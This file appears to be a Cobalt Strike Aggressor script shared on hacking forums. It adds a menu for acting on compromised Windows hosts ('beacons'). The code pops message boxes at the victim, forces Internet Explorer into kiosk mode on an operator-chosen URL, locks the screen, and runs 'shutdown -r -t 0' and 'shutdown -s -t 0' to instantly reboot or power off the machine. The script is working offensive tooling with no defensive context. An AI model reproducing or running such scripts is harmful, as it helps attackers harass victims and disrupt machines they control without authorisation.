##############################
#                            #
#                            #
#                            #
#       xway.cn@panda8       #
#       secquan.org@panda8   #
#		t00ls.com@panda8     #
#                            #
#                            #
#                            #
##############################
sub Send {
        $username = replace(beacon_info($bid,"user"),' \*',"");
        $msg = $3['msg'];
        if(($username cmp "SYSTEM") == 0){
            show_error("Cannot send message with SYSTEM !");
            return;
        }
        bshell($bid,"msg $username \"$msg\"");
    }


    menu "娱乐"{
                item "聊天弹框" {
            prompt_text("Alert", "你好！", lambda({
                bpowershell(@ids, 'Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("' . $1 . '", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")' );
                blog(@ids,"发送消息: $1 ");
            }, @ids => $1));
        }
        item "IE访问指定网站" {
            prompt_text("输入网址", "https://baidu.com", lambda({
                binput(@ids,"C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
                bshell(@ids, "C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
            }, @ids => $1));
        }


			item "锁屏" {
             prompt_text("确定锁屏?", "", lambda({
            bshell(@ids, "rundll32.exe user32.dll,LockWorkStation");
        }, @ids => $1));
    }

            item "亮屏"{
                    brun($1, "explorer.exe");
                }

			item "重启" {
             prompt_text("确定重启?", "", lambda({
            bshell(@ids, "shutdown -r -t 0");
        }, @ids => $1));
    }	

			item "关机" {
             prompt_text("确定关机?", "", lambda({
            bshell(@ids, "shutdown -s -t 0");
        }, @ids => $1));
    }	

            }

